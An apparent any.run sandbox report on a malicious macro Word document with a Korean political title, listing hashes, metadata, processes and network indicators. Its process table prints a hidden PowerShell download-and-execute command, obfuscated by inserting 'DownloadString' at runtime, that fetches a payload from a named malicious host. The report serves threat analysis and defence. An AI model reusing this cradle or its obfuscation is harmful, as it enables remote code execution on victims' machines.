File name: | 6da61776e984cac09f4d90ae830cecda.doc |
Full analysis: | https://app.any.run/tasks/181f8003-dc9e-4294-a9b0-7ab53d1979a2 |
Verdict: | Malicious activity |
Analysis date: | July 13, 2020, 06:53:26 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 6DA61776E984CAC09F4D90AE830CECDA |
SHA1: | BABD857D141775FA109AE200A8D0F28F57751992 |
SHA256: | 7805A5238C3A45BCE2F1AE263C47148F36251B9FE144186547224C92A0045D7F |
SSDEEP: | 3072:RhfSxn1qj5aR3/R9/XM/QdQtpSGH8Ixt0Ueor/OR+fTqCFH+1Kb:PGWaRZtXYQQJtzcfse1Kb |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0006 |
ZipCompression: | Deflated |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCRC: | 0xc59db370 |
ZipCompressedSize: | 417 |
ZipUncompressedSize: | 1636 |
ZipFileName: | [Content_Types].xml |
Title: | 새로운 시기 한반도 정세의 변화와 중국의 대응 |
---|---|
Creator: | user |
LastModifiedBy: | user |
---|---|
RevisionNumber: | 10 |
CreateDate: | 2020:07:08 00:00:00Z |
ModifyDate: | 2020:07:08 03:35:00Z |
Template: | 11.dotx |
TotalEditTime: | 26 minutes |
Pages: | 1 |
Words: | - |
Characters: | 14053 |
Application: | Microsoft Office Word |
DocSecurity: | None |
Lines: | 117 |
Paragraphs: | 28 |
ScaleCrop: | No |
HeadingPairs: |
|
TitlesOfParts: | 새로운 시기 한반도 정세의 변화와 중국의 대응 |
Company: | - |
LinksUpToDate: | No |
CharactersWithSpaces: | 14026 |
SharedDoc: | No |
HyperlinksChanged: | No |
AppVersion: | 16 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
128 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\6da61776e984cac09f4d90ae830cecda.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3824 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -command &{[string]$a={(New-Object Net.WebClient).Do('http://bascetball.atwebpages.com/ra/qt.txt')};$b=$a.insert(29,'wnloadString');$c=iex $b;iex $c} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
128 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8A05.tmp.cvr | — | |
MD5:— | SHA256:— | |||
128 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\mso91AD.tmp | — | |
MD5:— | SHA256:— | |||
3824 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XQDBHQV3OQ9I3C31TII6.temp | — | |
MD5:— | SHA256:— | |||
128 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:4A6FAF92CA01B9F0585D0B7337DF726D | SHA256:F41C6489E91AF04F9DFD783730DBD86495792BC0B92063C204CE40DF5BEACF8C | |||
128 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$a61776e984cac09f4d90ae830cecda.doc | pgc | |
MD5:B586036D37AC50D41F1FE16D73CFD084 | SHA256:31A7D1A846AFB32982F6BCB33842BE1541521A0AB511D08186F4A3E577E8E99B | |||
3824 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1694f1.TMP | binary | |
MD5:1E90447D6420E49907C88DAEEC8BED05 | SHA256:9FE71CFB47F0331094D9EF67424CBE92C8C52B7CBCE21ED256020E30E2A758C5 | |||
3824 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:1E90447D6420E49907C88DAEEC8BED05 | SHA256:9FE71CFB47F0331094D9EF67424CBE92C8C52B7CBCE21ED256020E30E2A758C5 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3824 | powershell.exe | GET | 404 | 185.176.43.84:80 | http://bascetball.atwebpages.com/ra/qt.txt | BG | html | 122 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3824 | powershell.exe | 185.176.43.84:80 | bascetball.atwebpages.com | Zetta Hosting Solutions LLC. | BG | malicious |
Domain | IP | Reputation |
---|---|---|
bascetball.atwebpages.com |
| malicious |